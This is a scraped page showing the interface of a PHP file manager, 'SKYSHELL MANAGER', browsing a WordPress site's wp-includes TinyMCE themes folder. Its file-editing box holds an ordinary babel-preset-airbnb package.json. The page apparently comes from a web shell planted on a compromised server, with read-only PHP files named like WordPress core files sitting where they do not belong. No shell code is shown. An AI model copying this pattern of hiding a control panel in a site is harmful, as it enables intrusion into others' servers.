📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "babel-preset-airbnb", "version": "5.0.0", "description": "A babel preset for transforming your JavaScript for Airbnb", "main": "index.js", "author": "Josh Perez <josh.perez@airbnb.com>", "repository": { "type": "git", "url": "git@github.com:airbnb/babel-preset-airbnb.git" }, "keywords": [ "babel", "es6", "es2015", "javascript" ], "license": "MIT", "dependencies": { "@babel/helper-plugin-utils": "^7.8.3", "@babel/plugin-proposal-nullish-coalescing-operator": "^7.8.3", "@babel/plugin-proposal-numeric-separator": "^7.8.3", "@babel/plugin-proposal-object-rest-spread": "^7.9.0", "@babel/plugin-proposal-optional-catch-binding": "^7.8.3", "@babel/plugin-proposal-optional-chaining": "^7.9.0", "@babel/plugin-transform-classes": "^7.9.2", "@babel/plugin-transform-exponentiation-operator": "^7.8.3", "@babel/plugin-transform-member-expression-literals": "^7.8.3", "@babel/plugin-transform-property-literals": "^7.8.3", "@babel/plugin-transform-property-mutators": "^7.8.3", "@babel/plugin-transform-runtime": "^7.9.0", "@babel/plugin-transform-template-literals": "^7.8.3", "@babel/preset-env": "^7.9.0", "@babel/preset-react": "^7.9.4", "babel-plugin-transform-react-remove-prop-types": "^0.4.24" }, "peerDependencies": { "@babel/core": "^7.0.0", "@babel/runtime": "^7.0.0" }, "devDependencies": { "@babel/core": "^7.0.0", "@babel/runtime": "^7.0.0", "eslint": "^5.16.0", "eslint-config-airbnb-base": "^13.1.0", "eslint-plugin-import": "^2.17.3", "safe-publish-latest": "^1.1.2" }, "scripts": { "prepublish": "safe-publish-latest", "pretest": "npm run lint", "test": "npm run tests-only", "tests-only": "node . && echo 'parsed successfully'", "lint": "eslint ." } }
Save